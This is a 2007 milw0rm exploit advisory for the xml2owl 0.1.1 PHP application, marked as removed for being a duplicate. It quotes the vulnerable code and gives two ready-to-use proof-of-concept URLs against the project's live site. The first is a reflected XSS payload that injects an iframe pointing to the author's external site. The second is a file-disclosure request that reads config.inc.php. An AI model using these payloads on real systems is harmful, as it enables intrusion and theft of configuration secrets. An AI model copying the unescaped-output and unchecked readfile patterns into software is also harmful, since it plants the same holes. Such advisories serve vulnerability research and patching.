xml2owl 0.1.1 (File Disclosure/XSS) Multiple Remote Vulnerabilities

* removed from database because of dupage *

http://milw0rm.com/exploits/4729

/str0ke

###################################################################################################################
#                                     xml2owl 0.1.1 Multiple Remote Vulnerability                                 #
###################################################################################################################
#                                                                                                                 #
#      1. XSS                                                                                                     #
#      2. Remote File Disclosure                                                                                  #
#                                                                                                                 #
###################################################################################################################
#                                                                                                                 #
#      1. XSS                                                                                                     #
#                                                                                                                 #
#       Code: (footer.inc.php?actualHint=xss)                                                                     #
#       <p>                                                                                                       #
#            <b>Hint:</b> <?=$actualHint?>                                                                        #
#       </p>                                                                                                      #
#                                                                                                                 #
#       P.O.C:                                                                                                    #
#       http://xml2owl.sourceforge.net/footer.inc.php?actualHint=%3Ciframe%20src=http://zerofool2005.isgreat.org%20width=100%%20height%20=%20300%%3E%3Cb%3E
#                                                                                                                 #
###################################################################################################################
#                                                                                                                 #
#       2. Remote File Disclosure                                                                                 #
#                                                								  #
#       Code: (filedownload.php?file=file)									  #
#       													  #
#       $file = $_REQUEST['file'];										  #
#														  #
#       header("Content-type: text/xml");									  #
#       header("Content-Disposition: attachment; filename=" . basename($file));					  #
#														  #
#       readfile($file);											  #
#														  #
#		P.O.C:								                                  #
#		http://xml2owl.sourceforge.net/filedownload.php?file=config.inc.php				  #
#														  #
###################################################################################################################
#														  #
#			Greetz From zerofool2005				                                  #
#			Shoutz To:										  #
#			[X]treme, dentrino, Tooget, atomiku							  #
#													          #
#			irc.atomirc.net #lobby									  #
#			http://zerofool2005.isgreat.org								  #
#														  #
###################################################################################################################

# milw0rm.com [2007-12-28]